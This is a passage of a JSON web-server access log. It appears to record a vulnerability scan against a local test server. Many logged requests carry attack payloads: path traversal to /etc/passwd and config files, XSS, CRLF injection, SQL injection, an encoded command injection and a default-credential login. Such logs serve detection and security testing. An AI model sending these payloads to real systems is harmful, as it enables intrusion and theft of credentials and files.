HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example%E3%80%82com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.original HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/jsp/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/123contactform-for-wordpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBAf0FuaCgAb7VcBA!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=i/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dfshealth.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mt/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"{\x22get_user_login_cmd\x22:{\x22name\x22:\x22admin\x22,\x22password\x22:\x2221232f297a57a5a743894a0e4a801fc3\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /net/net/net.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_wpeprivate/config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/websocket/index.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.php?file=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/pZHBDoIwDIYfqZVF4DoIEg5KBEHWi9mBIAnbjCEefHqH8SARJNGe2qRf_78tEFRAWt7aRvat0bKztSD3hKPgGGROwBDjEuH4bOBxWewx9NzUOzBMki3mWRSs_M0a6IN_n_Ti5wRiZ4Kf0J9r8PEXfmTwL_0Sl_YXlvfm-CRFKLS5KvuJHAgoDXeL9wKSBkR_VkPa6QZEra1N-rrJcKglqxdV2KjuEVM-czP-AKyJL-g!/dz/d5/L2dBISEvZ0FBIS9nQSEh/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/sdk/rest/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mt.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.DS_Store HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"\x0D\x0A{\x0D\x0A \x22type\x22:\x22EXEC\x22,\x0D\x0A \x22mbean\x22:\x22com.sun.management:type=HotSpotDiagnostic\x22,\x0D\x0A \x22operation\x22:\x22dumpHeap\x22,\x0D\x0A \x22arguments\x22:[\x0D\x0A \x22/tmp1234/test1.hprof\x22,\x0D\x0A 0\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jolokia/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dumpmdm.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ADSearch.cc?methodToCall=search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/initializers/secret_token.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CGI/Java/Serviceability?adapter=device.statistics.configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /comm.php?id=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 